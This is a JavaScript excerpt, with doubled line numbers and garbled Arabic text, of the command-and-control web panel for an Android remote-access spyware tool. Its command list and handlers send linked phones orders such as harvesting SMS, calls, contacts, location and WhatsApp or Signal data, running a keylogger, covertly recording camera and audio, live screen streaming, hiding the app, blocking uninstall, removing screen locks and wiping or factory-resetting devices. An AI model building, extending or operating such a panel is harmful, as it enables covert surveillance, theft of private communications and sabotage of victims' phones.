     1в†’     1в†’  3000в†’
     2в†’     2в†’  3001в†’function doLogout(){
     3в†’     3в†’  3002в†’try{api('web/logout',{method:'POST'});}catch(e){}
     4в†’     4в†’  3003в†’TOKEN='';localStorage.removeItem('az_token');
     5в†’     5в†’  3004в†’document.getElementById('app').style.display='none';
     6в†’     6в†’  3005в†’document.getElementById('loginPage').style.display='flex';
     7в†’     7в†’  3006в†’if(POLL_INTERVAL)clearInterval(POLL_INTERVAL);
     8в†’     8в†’  3007в†’}
     9в†’     9в†’  3008в†’
    10в†’    10в†’  3009в†’function showApp(){
    11в†’    11в†’  3010в†’document.getElementById('loginPage').style.display='none';
    12в†’    12в†’  3011в†’document.getElementById('app').style.display='block';
    13в†’    13в†’  3012в†’loadAll();
    14в†’    14в†’  3013в†’POLL_INTERVAL=setInterval(loadAll,5000);
    15в†’    15в†’  3014в†’}
    16в†’    16в†’  3015в†’
    17в†’    17в†’  3016в†’function toggleSidebar(){document.getElementById('sidebar').classList.toggle('open');}
    18в†’    18в†’  3017в†’
    19в†’    19в†’  3018в†’function showPage(name,event){
    20в†’    20в†’  3019в†’document.querySelectorAll('.page').forEach(p=>p.classList.remove('active'));
    21в†’    21в†’  3020в†’document.getElementById('page-'+name).classList.add('active');
    22в†’    22в†’  3021в†’document.querySelectorAll('.sidebar a').forEach(a=>a.classList.remove('active'));
    23в†’    23в†’  3022в†’if(event&&event.target)event.target.classList.add('active');
    24в†’    24в†’  3023в†’document.getElementById('sidebar').classList.remove('open');
    25в†’    25в†’  3024в†’}
    26в†’    26в†’  3025в†’
    27в†’    27в†’  3026в†’function updateClock(){
    28в†’    28в†’  3027в†’const now=new Date();
    29в†’    29в†’  3028в†’document.getElementById('clock').textContent=now.toLocaleString('ar-SA');
    30в†’    30в†’  3029в†’}
    31в†’    31в†’  3030в†’setInterval(updateClock,1000);updateClock();
    32в†’    32в†’  3031в†’
    33в†’    33в†’  3032в†’function populateDeviceSelects(){
    34в†’    34в†’  3033в†’const html=DEVICES.map(d=>`<option value="${d.id}">${d.name||d.id} (${d.active?'рџџў':'рџ”ґ'})</option>`).join('');
    35в†’    35в†’  3034в†’['cmdDevice','fileDevice','dataDevice','monDevice','streamDevice'].forEach(id=>{
    36в†’    36в†’  3035в†’const el=document.getElementById(id);if(el)el.innerHTML=html;
    37в†’    37в†’  3036в†’});
    38в†’    38в†’  3037в†’}
    39в†’    39в†’  3038в†’
    40в†’    40в†’  3039в†’async function loadAll(){
    41в†’    41в†’  3040в†’try{const r=await api('web/stats');if(r.ok)renderStats(r.stats);}catch(e){}
    42в†’    42в†’  3041в†’try{const r=await api('web/devices');if(r.ok){DEVICES=r.devices||[];populateDeviceSelects();renderDevices();}}catch(e){}
    43в†’    43в†’  3042в†’try{const r=await api('web/commands');if(r.ok)renderCommandLog(r.commands);}catch(e){}
    44в†’    44в†’  3043в†’loadEvents();
    45в†’    45в†’  3044в†’loadSettings();
    46в†’    46в†’  3045в†’}
    47в†’    47в†’  3046в†’
    48в†’    48в†’  3047в†’function renderStats(s){
    49в†’    49в†’  3048в†’const grid=document.getElementById('statsGrid');
    50в†’    50в†’  3049в†’grid.innerHTML=`
    51в†’    51в†’  3050в†’<div class="stat-card"><div class="label">вЏ± Uptime</div><div class="value">${s.uptime_formatted||'-'}</div></div>
    52в†’    52в†’  3051в†’<div class="stat-card"><div class="label">рџ“± Devices</div><div class="value" style="color:var(--blue)">${s.devices_total}</div><div class="sub">рџџў ${s.devices_online} online</div></div>
    53в†’    53в†’  3052в†’<div class="stat-card"><div class="label">рџ“‹ Commands</div><div class="value" style="color:var(--yellow)">${s.total_registered_commands}</div><div class="sub">вЏі ${s.commands_pending} pending</div></div>
    54в†’    54в†’  3053в†’<div class="stat-card"><div class="label">рџ“Ё Messages</div><div class="value" style="color:var(--purple)">${s.messages_sent}</div></div>
    55в†’    55в†’  3054в†’<div class="stat-card"><div class="label">рџ“Ў API</div><div class="value">${s.api_hits}</div><div class="sub">hits</div></div>
    56в†’    56в†’  3055в†’<div class="stat-card"><div class="label">вњ… Completed</div><div class="value" style="color:var(--green)">${s.commands_completed}</div></div>`;
    57в†’    57в†’  3056в†’}
    58в†’    58в†’  3057в†’
    59в†’    59в†’  3058в†’function renderDevices(){
    60в†’    60в†’  3059в†’const el=document.getElementById('deviceList');
    61в†’    61в†’  3060в†’const dash=document.getElementById('dashDevices');
    62в†’    62в†’  3061в†’if(!DEVICES.length){
    63в†’    63в†’  3062в†’el.innerHTML='<div class="empty">No devices linked</div>';
    64в†’    64в†’  3063в†’dash.innerHTML='<div class="empty">No devices</div>';
    65в†’    65в†’  3064в†’return;
    66в†’    66в†’  3065в†’}
    67в†’    67в†’  3066в†’const card=d=>`
    68в†’    68в†’  3067в†’<div class="device-card" onclick="showDeviceDetail('${d.id}')">
    69в†’    69в†’  3068в†’<div class="name">${d.active?'рџџў':'рџ”ґ'} ${d.name||d.id}</div>
    70в†’    70в†’  3069в†’<div class="meta">Model: ${d.model||'-'} | OS: ${d.os||'-'}</div>
    71в†’    71в†’  3070в†’<div class="meta">Battery: ${d.battery||'-'}% | Last: ${d.last_seen||'-'}</div>
    72в†’    72в†’  3071в†’</div>`;
    73в†’    73в†’  3072в†’el.innerHTML=DEVICES.map(card).join('');
    74в†’    74в†’  3073в†’dash.innerHTML=DEVICES.slice(0,4).map(card).join('');
    75в†’    75в†’  3074в†’}
    76в†’    76в†’  3075в†’
    77в†’    77в†’  3076в†’async function showDeviceDetail(id){
    78в†’    78в†’  3077в†’try{
    79в†’    79в†’  3078в†’const r=await api('web/device/'+id);
    80в†’    80в†’  3079в†’if(!r.ok)return;
    81в†’    81в†’  3080в†’const d=r.device;const cmds=r.commands||[];
    82в†’    82в†’  3081в†’const detail=document.getElementById('deviceDetail');
    83в†’    83в†’  3082в†’detail.style.display='block';
    84в†’    84в†’  3083в†’detail.innerHTML=`
    85в†’    85в†’  3084в†’<h2>рџ“± ${d.name||d.id}</h2>
    86в†’    86в†’  3085в†’<div style="display:grid;grid-template-columns:1fr 1fr;gap:12px;margin:16px 0">
    87в†’    87в†’  3086в†’<div><span style="color:var(--text2)">ID:</span> <code>${d.id}</code></div>
    88в†’    88в†’  3087в†’<div><span style="color:var(--text2)">Status:</span> ${d.active?'<span class="badge badge-green">Online</span>':'<span class="badge badge-red">Offline</span>'}</div>
    89в†’    89в†’  3088в†’<div><span style="color:var(--text2)">Model:</span> ${d.model||'-'}</div>
    90в†’    90в†’  3089в†’<div><span style="color:var(--text2)">OS:</span> ${d.os||'-'}</div>
    91в†’    91в†’  3090в†’<div><span style="color:var(--text2)">Battery:</span> ${d.battery||'-'}%</div>
    92в†’    92в†’  3091в†’<div><span style="color:var(--text2)">Network:</span> ${d.network||'-'}</div>
    93в†’    93в†’  3092в†’<div><span style="color:var(--text2)">Location:</span> ${d.location||'-'}</div>
    94в†’    94в†’  3093в†’<div><span style="color:var(--text2)">Last Seen:</span> ${d.last_seen||'-'}</div>
    95в†’    95в†’  3094в†’</div>
    96в†’    96в†’  3095в†’<h3>рџ“‹ Recent Commands</h3>
    97в†’    97в†’  3096в†’${cmds.length?cmds.map(c=>`<div class="cmd-item"><div class="cmd-header"><span>${c.command}</span><span class="badge badge-${c.status==='completed'?'green':c.status==='pending'?'yellow':'blue'}">${c.status}</span></div><div style="color:var(--text2);font-size:12px">${c.created_at} | ID: ${c.id}</div></div>`).join(''):'<div class="empty">No commands</div>'}
    98в†’    98в†’  3097в†’<button class="btn btn-danger btn-sm" onclick="unlinkDevice('${d.id}')" style="margin-top:16px">рџ—‘пёЏ Unlink Device</button>`;
    99в†’    99в†’  3098в†’detail.scrollIntoView({behavior:'smooth'});
   100в†’   100в†’  3099в†’}catch(e){}
   101в†’   101в†’  3100в†’}
   102в†’   102в†’  3101в†’
   103в†’   103в†’  3102в†’async function unlinkDevice(id){
   104в†’   104в†’  3103в†’if(!confirm('Unlink this device?'))return;
   105в†’   105в†’  3104в†’const r=await api('web/unlink/'+id,{method:'DELETE'});
   106в†’   106в†’  3105в†’if(r.ok){notify('Device unlinked');loadAll();}
   107в†’   107в†’  3106в†’else notify('Failed','var(--accent)');
   108в†’   108в†’  3107в†’}
   109в†’   109в†’  3108в†’
   110в†’   110в†’  3109в†’async function generateLink(){
   111в†’   111в†’  3110в†’const r=await api('web/link_code');
   112в†’   112в†’  3111в†’if(r.ok){
   113в†’   113в†’  3112в†’const box=document.getElementById('linkCodeBox');
   114в†’   114в†’  3113в†’document.getElementById('linkCodeText').textContent=r.code;
   115в†’   115в†’  3114в†’box.style.display='block';
   116в†’   116в†’  3115в†’notify('Link code generated!');
   117в†’   117в†’  3116в†’}
   118в†’   118в†’  3117в†’}
   119в†’   119в†’  3118в†’
   120в†’   120в†’  3119в†’const CMD_CATEGORIES={
   121в†’   121в†’  3120в†’data:{label:'рџ“Љ Data',cmds:['sms','calls','contacts','location','notifications','apps','info','battery','gallery','clipboard','all_data','wifi_info','bluetooth_devices','network_info','sim_info','storage_info','installed_apps','running_apps','calendar','browser_history']},
   122в†’   122в†’  3121в†’social:{label:'рџЊђ Social',cmds:['whatsapp','telegram_app','instagram','messenger','snapchat','tiktok','twitter','viber','signal','facebook','whatsapp_status','whatsapp_stories','telegram_channels','instagram_stories','youtube']},
   123в†’   123в†’  3122в†’control:{label:'рџЋ® Control',cmds:['ping','vibrate','ring','screenshot','front_camera','back_camera','record_audio','record_video','lock_phone','unlock_phone','reboot','shutdown','set_volume','set_brightness','enable_wifi','disable_wifi','enable_bluetooth','disable_bluetooth','enable_mobile_data','disable_mobile_data','enable_hotspot','disable_hotspot','airplane_on','airplane_off','torch_on','torch_off','play_sound','speak_text','open_url','send_sms','make_call','block_number','unblock_number']},
   124в†’   124в†’  3123в†’apps:{label:'рџ“¦ Apps',cmds:['open_app','close_app','install_app','uninstall_app','block_app','unblock_app','clear_app_data','force_stop_app','app_info','app_usage','screen_time','app_permissions','enable_app','disable_app','list_blocked','clear_cache','update_app','launch_app','kill_app','app_cache']},
   125в†’   125в†’  3124в†’files:{label:'рџ“‚ Files',cmds:['list_files','get_file','download_file','list_downloads','list_dcim','list_music','list_videos','list_documents','list_whatsapp','list_telegram_files','send_contacts_backup','send_sms_backup','send_calls_backup','send_full_backup','delete_file','rename_file','copy_file','move_file','create_folder','search_files','recent_files','file_info','zip_files']},
   126в†’   126в†’  3125в†’security:{label:'рџ”’ Security',cmds:['wipe_data','factory_reset','show_app','hide_app','change_passcode','set_pin','remove_pin','enable_biometric','disable_biometric','anti_uninstall_on','anti_uninstall_off','device_admin_status','check_root','set_screen_lock','remove_screen_lock']},
   127в†’   127в†’  3126в†’monitor:{label:'рџ”Ќ Monitor',cmds:['keylogger_start','keylogger_stop','get_keylogger','screen_record_start','screen_record_stop','clipboard_monitor_start','clipboard_monitor_stop','get_clipboard_log','wifi_monitor_start','wifi_monitor_stop','app_monitor_start','app_monitor_stop','get_app_log','location_live','location_stop','location_history','geo_add','geo_remove','geo_list','sms_monitor','call_monitor']},
   128в†’   128в†’  3127в†’syssettings:{label:'вљ™пёЏ System',cmds:['set_language','set_timezone','set_alarm','set_timer','set_reminder','enable_dev_mode','disable_dev_mode','enable_usb_debug','disable_usb_debug','dns_change','proxy_set','apn_settings','nfc_on','nfc_off','auto_update_on','auto_update_off']}
   129в†’   129в†’  3128в†’};
   130в†’   130в†’  3129в†’
   131в†’   131в†’  3130в†’function initCmdTabs(){
   132в†’   132в†’  3131в†’const tabs=document.getElementById('cmdTabs');
   133в†’   133в†’  3132в†’tabs.innerHTML=Object.keys(CMD_CATEGORIES).map(k=>`<button class="tab${k==='data'?' active':''}" onclick="showCmdCat('${k}',this)">${CMD_CATEGORIES[k].label}</button>`).join('');
   134в†’   134в†’  3133в†’showCmdCat('data');
   135в†’   135в†’  3134в†’}
   136в†’   136в†’  3135в†’
   137в†’   137в†’  3136в†’function showCmdCat(cat,btn){
   138в†’   138в†’  3137в†’if(btn){document.querySelectorAll('#cmdTabs .tab').forEach(t=>t.classList.remove('active'));btn.classList.add('active');}
   139в†’   139в†’  3138в†’const grid=document.getElementById('cmdGrid');
   140в†’   140в†’  3139в†’grid.innerHTML=CMD_CATEGORIES[cat].cmds.map(c=>`<button class="cmd-btn" onclick="sendDeviceCmd('${c}')">${c.replace(/_/g,' ')}</button>`).join('');
   141в†’   141в†’  3140в†’}
   142в†’   142в†’  3141в†’
   143в†’   143в†’  3142в†’async function sendDeviceCmd(cmd){
   144в†’   144в†’  3143в†’const devId=document.getElementById('cmdDevice').value;
   145в†’   145в†’  3144в†’if(!devId){notify('Select a device','var(--accent)');return;}
   146в†’   146в†’  3145в†’const r=await api('web/send_command',{method:'POST',body:JSON.stringify({device_id:devId,command:cmd})});
   147в†’   147в†’  3146в†’if(r.ok)notify('Command sent!');else notify('Failed','var(--accent)');
   148в†’   148в†’  3147в†’loadAll();
   149в†’   149в†’  3148в†’}
   150в†’   150в†’  3149в†’
   151в†’   151в†’  3150в†’function sendCmd(cmd){
   152в†’   152в†’  3151в†’const devId=document.getElementById('fileDevice').value;
   153в†’   153в†’  3152в†’if(!devId){notify('Select a device','var(--accent)');return;}
   154в†’   154в†’  3153в†’api('web/send_command',{method:'POST',body:JSON.stringify({device_id:devId,command:cmd})}).then(r=>{
   155в†’   155в†’  3154в†’if(r.ok)notify('Command sent!');else notify('Failed','var(--accent)');
   156в†’   156в†’  3155в†’});
   157в†’   157в†’  3156в†’}
   158в†’   158в†’  3157в†’function sendDataCmd(cmd){
   159в†’   159в†’  3158в†’const devId=document.getElementById('dataDevice').value;
   160в†’   160в†’  3159в†’if(!devId){notify('Select a device','var(--accent)');return;}
   161в†’   161в†’  3160в†’api('web/send_command',{method:'POST',body:JSON.stringify({device_id:devId,command:'get_'+cmd})}).then(r=>{
   162в†’   162в†’  3161в†’if(r.ok)notify('Command sent!');else notify('Failed','var(--accent)');
   163в†’   163в†’  3162в†’});
   164в†’   164в†’  3163в†’}
   165в†’   165в†’  3164в†’function sendMonCmd(cmd){
   166в†’   166в†’  3165в†’const devId=document.getElementById('monDevice').value;
   167в†’   167в†’  3166в†’if(!devId){notify('Select a device','var(--accent)');return;}
   168в†’   168в†’  3167в†’api('web/send_command',{method:'POST',body:JSON.stringify({device_id:devId,command:cmd})}).then(r=>{
   169в†’   169в†’  3168в†’if(r.ok)notify('Command sent!');else notify('Failed','var(--accent)');
   170в†’   170в†’  3169в†’});
   171в†’   171в†’  3170в†’}
   172в†’   172в†’  3171в†’
   173в†’   173в†’  3172в†’function renderCommandLog(cmds){
   174в†’   174в†’  3173в†’const el=document.getElementById('cmdLog');
   175в†’   175в†’  3174в†’const dash=document.getElementById('dashCommands');
   176в†’   176в†’  3175в†’const items=(cmds||[]).slice(-20).reverse();
   177в†’   177в†’  3176в†’if(!items.length){el.innerHTML='<div class="empty">No commands</div>';dash.innerHTML='';return;}
   178в†’   178в†’  3177в†’const html=items.map(c=>`<div class="cmd-item"><div class="cmd-header"><span>${c.command}</span><span class="badge badge-${c.status==='completed'?'green':c.status==='pending'?'yellow':'blue'}">${c.status}</span></div><div style="color:var(--text2);font-size:12px">Device: ${c.device_id} | ${c.created_at}</div></div>`).join('');
   179в†’   179в†’  3178в†’el.innerHTML=html;
   180в†’   180в†’  3179в†’dash.innerHTML=html;
   181в†’   181в†’  3180в†’}
   182в†’   182в†’  3181в†’
   183в†’   183в†’  3182в†’async function loadEvents(){
   184в†’   184в†’  3183в†’const r=await api('web/events');
   185в†’   185в†’  3184в†’if(r.ok){
   186в†’   186в†’  3185в†’const el=document.getElementById('eventLog');
   187в†’   187в†’  3186в†’el.innerHTML=(r.events||[]).slice(-50).reverse().map(e=>`<div class="log-item"><span class="time">${(e.time||'').slice(0,19)}</span><span class="event">${e.event} ${e.details?JSON.stringify(e.details).slice(0,60):''}</span></div>`).join('')||'<div class="empty">No events</div>';
   188в†’   188в†’  3187в†’}
   189в†’   189в†’  3188в†’}
   190в†’   190в†’  3189в†’
   191в†’   191в†’  3190в†’async function loadSettings(){
   192в†’   192в†’  3191в†’const r=await api('web/settings');
   193в†’   193в†’  3192в†’if(r.ok){
   194в†’   194в†’  3193в†’const s=r.settings;
   195в†’   195в†’  3194в†’document.getElementById('settingsForm').innerHTML=`
   196в†’   196в†’  3195в†’<label style="display:block;margin-bottom:12px">рџ”‘ Admin Password<input id="setPass" value="${s.admin_password||'admin'}" style="display:block;width:100%;padding:8px;border-radius:6px;border:1px solid var(--border);background:var(--bg);color:var(--text);margin-top:4px"></label>
   197в†’   197в†’  3196в†’<label style="display:block;margin-bottom:12px">вЏ±пёЏ Sync Interval (sec)<input id="setSync" type="number" value="${s.sync_interval||300}" style="display:block;width:100%;padding:8px;border-radius:6px;border:1px solid var(--border);background:var(--bg);color:var(--text);margin-top:4px"></label>
   198в†’   198в†’  3197в†’<label style="display:block;margin-bottom:12px">рџ“Ќ Location Interval (sec)<input id="setLoc" type="number" value="${s.location_interval||60}" style="display:block;width:100%;padding:8px;border-radius:6px;border:1px solid var(--border);background:var(--bg);color:var(--text);margin-top:4px"></label>
   199в†’   199в†’  3198в†’<label style="display:block;margin-bottom:12px">рџЊђ Language<select id="setLang" style="display:block;width:100%;padding:8px;border-radius:6px;border:1px solid var(--border);background:var(--bg);color:var(--text);margin-top:4px"><option value="ar" ${s.language==='ar'?'selected':''}>Arabic</option><option value="en" ${s.language==='en'?'selected':''}>English</option></select></label>
   200в†’   200в†’  3199в†’<label style="display:flex;align-items:center;gap:8px;margin-bottom:12px"><input type="checkbox" id="setNotif" ${s.notifications?'checked':''}> рџ”” Notifications</label>
   201в†’   201в†’  3200в†’<label style="display:flex;align-items:center;gap:8px;margin-bottom:12px"><input type="checkbox" id="setAutoLoc" ${s.auto_location?'checked':''}> рџ—єпёЏ Auto Location</label>
   202в†’   202в†’  3201в†’<label style="display:flex;align-items:center;gap:8px;margin-bottom:12px"><input type="checkbox" id="setAutoSync" ${s.auto_sync?'checked':''}> рџ”„ Auto Sync</label>`;
   203в†’   203в†’  3202в†’}
   204в†’   204в†’  3203в†’}
   205в†’   205в†’  3204в†’
   206в†’   206в†’  3205в†’async function saveSettings(){
   207в†’   207в†’  3206в†’const data={
   208в†’   208в†’  3207в†’admin_password:document.getElementById('setPass').value,
   209в†’   209в†’  3208в†’sync_interval:parseInt(document.getElementById('setSync').value),
   210в†’   210в†’  3209в†’location_interval:parseInt(document.getElementById('setLoc').value),
   211в†’   211в†’  3210в†’language:document.getElementById('setLang').value,
   212в†’   212в†’  3211в†’notifications:document.getElementById('setNotif').checked,
   213в†’   213в†’  3212в†’auto_location:document.getElementById('setAutoLoc').checked,
   214в†’   214в†’  3213в†’auto_sync:document.getElementById('setAutoSync').checked,
   215в†’   215в†’  3214в†’};
   216в†’   216в†’  3215в†’const r=await api('web/settings',{method:'PUT',body:JSON.stringify(data)});
   217в†’   217в†’  3216в†’if(r.ok)notify('Settings saved!');else notify('Failed','var(--accent)');
   218в†’   218в†’  3217в†’}
   219в†’   219в†’  3218в†’
   220в†’   220в†’  3219в†’if(TOKEN){showApp();}
   221в†’   221в†’  3220в†’initCmdTabs();
   222в†’   222в†’  3221в†’setTimeout(loadSettings,500);
   223в†’   223в†’  3222в†’
   224в†’   224в†’  3223в†’// ========== LIVE STREAMING (JPEG Screenshot-based) ==========
   225в†’   225в†’  3224в†’let _streamType='screen';
   226в†’   226в†’  3225в†’let _streamActive=false;
   227в†’   227в†’  3226в†’let _streamPollTimer=null;
   228в†’   228в†’  3227в†’let _frameCount=0;
   229в†’   229в†’  3228в†’let _audioAnimFrame=null;
   230в†’   230в†’  3229в†’let _streamWaitingTimer=null;
   231в†’   231в†’  3230в†’let _firstFrameReceived=false;
   232в†’   232в†’  3231в†’let _lastFrameData='';
   233в†’   233в†’  3232в†’let _streamQuality=3;
   234в†’   234в†’  3233в†’
   235в†’   235в†’  3234в†’
   236в†’   236в†’  3235в†’
   237в†’   237в†’  3236в†’function onStreamDeviceChange(){
   238в†’   238в†’  3237в†’const devId=document.getElementById('streamDevice').value;
   239в†’   239в†’  3238в†’document.getElementById('stDevice').textContent=devId?((DEVICES.find(function(d){return d.id===devId;})||{}).name||devId):'-';
   240в†’   240в†’  3239в†’if(_streamActive)stopStream();
   241в†’   241в†’  3240в†’}
   242в†’   242в†’  3241в†’
   243в†’   243в†’  3242в†’function selectStreamType(type){
   244в†’   244в†’  3243в†’_streamType=type;
   245в†’   245в†’  3244в†’document.querySelectorAll('.stream-type-btn').forEach(function(b){b.classList.remove('active');});
   246в†’   246в†’  3245в†’var btnId=type==='screen'?'stScreen':type==='camera'?'stCamera':'stAudio';
   247в†’   247в†’  3246в†’document.getElementById(btnId).classList.add('active');
   248в†’   248в†’  3247в†’document.getElementById('qualityCard').style.display=type==='audio'?'none':'block';
   249в†’   249в†’  3248в†’}
   250в†’   250в†’  3249в†’
   251в†’   251в†’  3250в†’function setQuality(q,btn){
   252в†’   252в†’  3251в†’_streamQuality={'low':8,'medium':3,'high':1}[q]||3;
   253в†’   253в†’  3252в†’document.querySelectorAll('.stream-quality button').forEach(function(b){b.classList.remove('active');});
   254в†’   254в†’  3253в†’btn.classList.add('active');
   255в†’   255в†’  3254в†’notify('ШЄЩ… ШЄШєЩЉЩЉШ± Ш§Щ„Ш¬Щ€ШЇШ©');
   256в†’   256в†’  3255в†’}
   257в†’   257в†’  3256в†’
   258в†’   258в†’  3257в†’function _setViewerState(state){
   259в†’   259в†’  3258в†’var viewer=document.getElementById('streamViewer');
   260в†’   260в†’  3259в†’var noMsg=document.getElementById('noStreamMsg');
   261в†’   261в†’  3260в†’var img=document.getElementById('streamImg');
   262в†’   262в†’  3261в†’var badge=document.getElementById('streamBadge');
   263в†’   263в†’  3262в†’var audioC=document.getElementById('audioPlayerContainer');
   264в†’   264в†’  3263в†’noMsg.style.display='none';img.style.display='none';badge.style.display='none';audioC.style.display='none';viewer.style.background='#000';
   265в†’   265в†’  3264в†’if(state==='idle'){noMsg.style.display='';noMsg.innerHTML='<div style="font-size:48px;margin-bottom:12px">&#x1F4E1;</div>Ш§Ш®ШЄШ± Ш¬Щ‡Ш§ШІШ§Щ‹ Щ€Ш§ШЁШЇШЈ Ш§Щ„ШЁШ« Ш§Щ„Щ…ШЁШ§ШґШ±';viewer.style.background='var(--surface)';}
   266в†’   266в†’  3265в†’else if(state==='waiting'){noMsg.style.display='';noMsg.innerHTML='<div style="text-align:center"><div class="pulse" style="font-size:48px;margin-bottom:16px">&#x231B;</div><div style="font-size:16px;font-weight:600;margin-bottom:8px">Ш¬Ш§Ш±ЩЉ Ш§Щ†ШЄШёШ§Ш± Ш§Щ„ШµЩ€Ш±Ш© Щ…Щ† Ш§Щ„Ш¬Щ‡Ш§ШІ...</div><div style="color:var(--text2);font-size:13px">ЩЉШЄЩ… ШҐШ±ШіШ§Щ„ ШЈЩ…Ш± Щ„Щ‚Ш·Ш© Ш§Щ„ШґШ§ШґШ© Щ„Щ„Ш¬Щ‡Ш§ШІ.<br>Щ‚ШЇ ЩЉШіШЄШєШ±Щ‚ Ш§Щ„ШЈЩ…Ш± ШЁШ¶Ш№ Ш«Щ€Ш§Щ†ЩЌ Щ„Щ„ШҐШ·Ш§Ш± Ш§Щ„ШЈЩ€Щ„.<br>ШЄШЈЩѓШЇ ШЈЩ† Ш§Щ„Ш¬Щ‡Ш§ШІ Щ…ШЄШµЩ„ ШЁШ§Щ„ШҐЩ†ШЄШ±Щ†ШЄ Щ€ШЈЩ† ШҐШ°Щ† Ш§Щ„ШЄЩ‚Ш§Ш· Ш§Щ„ШґШ§ШґШ© Щ…Щ…Щ†Щ€Ш­Ш©.</div></div>';document.getElementById('stStatus').innerHTML='<span style="color:var(--yellow)">в—Џ Ш§Щ†ШЄШёШ§Ш±...</span>';}
   267в†’   267в†’  3266в†’else if(state==='connected'){document.getElementById('stStatus').innerHTML='<span style="color:var(--blue)">в—Џ Щ…ШЄШµЩ„ - ЩЉЩ†ШЄШёШ± ШҐШ·Ш§Ш±...</span>';}
   268в†’   268в†’  3267в†’else if(state==='receiving_video'){img.style.display='';badge.style.display='';badge.className='stream-badge live';noMsg.style.display='none';document.getElementById('stStatus').innerHTML='<span style="color:var(--green)">в—Џ Щ…ШЁШ§ШґШ±</span>';}
   269в†’   269в†’  3268в†’else if(state==='receiving_audio'){audioC.style.display='block';badge.style.display='';badge.className='stream-badge live';noMsg.style.display='none';document.getElementById('stStatus').innerHTML='<span style="color:var(--green)">в—Џ Щ…ШЁШ§ШґШ±</span>';}
   270в†’   270в†’  3269в†’else if(state==='error'){noMsg.style.display='';noMsg.innerHTML='<div style="text-align:center"><div style="font-size:48px;margin-bottom:16px">&#x26A0;&#xFE0F;</div><div style="font-size:16px;font-weight:600;margin-bottom:8px;color:var(--accent)">Щ„Щ… ЩЉШЄЩ… Ш§ШіШЄЩ„Ш§Щ… Ш§Щ„ШЁШ«</div><div style="color:var(--text2);font-size:13px">ШЄШЈЩѓШЇ ШЈЩ† Ш§Щ„Ш¬Щ‡Ш§ШІ Щ…ШЄШµЩ„ Щ€ЩЉЩ…ЩѓЩ†Щ‡ ШЄЩ†ЩЃЩЉШ° ШЈЩ…Ш± Щ„Щ‚Ш·Ш© Ш§Щ„ШґШ§ШґШ©.<br>ШЄШЈЩѓШЇ Щ…Щ† Щ…Щ†Ш­ ШҐШ°Щ† Ш§Щ„ШЄЩ‚Ш§Ш· Ш§Щ„ШґШ§ШґШ© ЩЃЩЉ ШЄШ·ШЁЩЉЩ‚ Ш§Щ„Ш¬Щ‡Ш§ШІ.<br>Ш­Ш§Щ€Щ„ Щ…Ш±Ш© ШЈШ®Ш±Щ‰.</div></div>';document.getElementById('stStatus').innerHTML='<span style="color:var(--accent)">в—Џ ЩЃШґЩ„</span>';}
   271в†’   271в†’  3270в†’}
   272в†’   272в†’  3271в†’
   273в†’   273в†’  3272в†’async function startStream(){
   274в†’   274в†’  3273в†’var devId=document.getElementById('streamDevice').value;
   275в†’   275в†’  3274в†’if(!devId){notify('Ш§Ш®ШЄШ± Ш¬Щ‡Ш§ШІШ§Щ‹ ШЈЩ€Щ„Ш§Щ‹','var(--accent)');return;}
   276в†’   276в†’  3275в†’_streamActive=true;_frameCount=0;_firstFrameReceived=false;_lastFrameData='';
   277в†’   277в†’  3276в†’document.getElementById('btnStartStream').style.display='none';
   278в†’   278в†’  3277в†’document.getElementById('btnStopStream').style.display='';
   279в†’   279в†’  3278в†’document.getElementById('btnSwitchCam').style.display=_streamType==='camera'?'':'none';
   280в†’   280в†’  3279в†’document.getElementById('stFrames').textContent='0';
   281в†’   281в†’  3280в†’document.getElementById('stLastAct').textContent='-';
   282в†’   282в†’  3281в†’var typeLabel=_streamType==='screen'?'Ш§Щ„ШґШ§ШґШ©':_streamType==='camera'?'Ш§Щ„ЩѓШ§Щ…ЩЉШ±Ш§':'Ш§Щ„ШµЩ€ШЄ';
   283в†’   283в†’  3282в†’document.getElementById('stType').textContent=typeLabel;
   284в†’   284в†’  3283в†’var dev=DEVICES.find(function(d){return d.id===devId;});
   285в†’   285в†’  3284в†’document.getElementById('stDevice').textContent=(dev&&dev.name)||devId;
   286в†’   286в†’  3285в†’_setViewerState('waiting');
   287в†’   287в†’  3286в†’notify('Ш¬Ш§Ш±ЩЉ ШЁШЇШЎ Ш§Щ„ШЁШ«: '+typeLabel);
   288в†’   288в†’  3287в†’var interval=_streamType==='audio'?5:_streamQuality;
   289в†’   289в†’  3288в†’var r=await api('stream/jpeg_start',{method:'POST',body:JSON.stringify({device_id:devId,type:_streamType,interval:interval})});
   290в†’   290в†’  3289в†’if(!r.ok){notify('ЩЃШґЩ„ ШЁШЇШЎ Ш§Щ„ШЁШ«: '+(r.error||''),'var(--accent)');_setViewerState('error');_streamActive=false;document.getElementById('btnStartStream').style.display='';document.getElementById('btnStopStream').style.display='none';return;}
   291в†’   291в†’  3290в†’notify('ШЄЩ… ШЁШЇШЎ Ш§Щ„ШЁШ« - ШЁШ§Щ†ШЄШёШ§Ш± Ш§Щ„ШҐШ·Ш§Ш± Ш§Щ„ШЈЩ€Щ„...');
   292в†’   292в†’  3291в†’startStreamPolling(devId);
   293в†’   293в†’  3292в†’if(_streamWaitingTimer)clearTimeout(_streamWaitingTimer);
   294в†’   294в†’  3293в†’_streamWaitingTimer=setTimeout(function(){if(_streamActive&&!_firstFrameReceived){_setViewerState('error');}},60000);
   295в†’   295в†’  3294в†’}
   296в†’   296в†’  3295в†’
   297в†’   297в†’  3296в†’async function stopStream(){
   298в†’   298в†’  3297в†’var devId=document.getElementById('streamDevice').value;
   299в†’   299в†’  3298в†’if(!devId)return;
   300в†’   300в†’  3299в†’api('stream/jpeg_stop',{method:'POST',body:JSON.stringify({device_id:devId})});
   301в†’   301в†’  3300в†’_cleanupStream();
   302в†’   302в†’  3301в†’notify('ШЄЩ… ШҐЩЉЩ‚Ш§ЩЃ Ш§Щ„ШЁШ«');
   303в†’   303в†’  3302в†’}
   304в†’   304в†’  3303в†’
   305в†’   305в†’  3304в†’function _cleanupStream(){
   306в†’   306в†’  3305в†’_streamActive=false;_firstFrameReceived=false;_lastFrameData='';
   307в†’   307в†’  3306в†’if(_streamPollTimer){clearInterval(_streamPollTimer);_streamPollTimer=null;}
   308в†’   308в†’  3307в†’if(_streamWaitingTimer){clearTimeout(_streamWaitingTimer);_streamWaitingTimer=null;}
   309в†’   309в†’  3308в†’if(_audioAnimFrame){cancelAnimationFrame(_audioAnimFrame);_audioAnimFrame=null;}
   310в†’   310в†’  3309в†’document.getElementById('btnStartStream').style.display='';
   311в†’   311в†’  3310в†’document.getElementById('btnStopStream').style.display='none';
   312в†’   312в†’  3311в†’document.getElementById('btnSwitchCam').style.display='none';
